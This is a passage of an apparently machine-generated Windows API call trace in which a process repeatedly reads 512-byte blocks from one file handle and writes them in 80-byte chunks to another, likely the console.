lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, 
lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.541] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.541] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, 
lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] GetFileType (hFile=0x50) returned 0x1 [0134.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.541] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 
[0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] GetFileType (hFile=0x50) returned 0x1 [0134.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.542] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.542] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.542] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.543] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, 
lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] GetFileType (hFile=0x50) returned 0x1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.543] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: 
lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.544] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.544] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] GetFileType (hFile=0x50) returned 0x1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.544] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.544] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.545] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.545] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] 
GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 
[0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.545] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.545] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.546] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.546] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.546] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.546] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.547] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.547] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType 
(hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.547] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.547] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.548] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.548] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.548] 
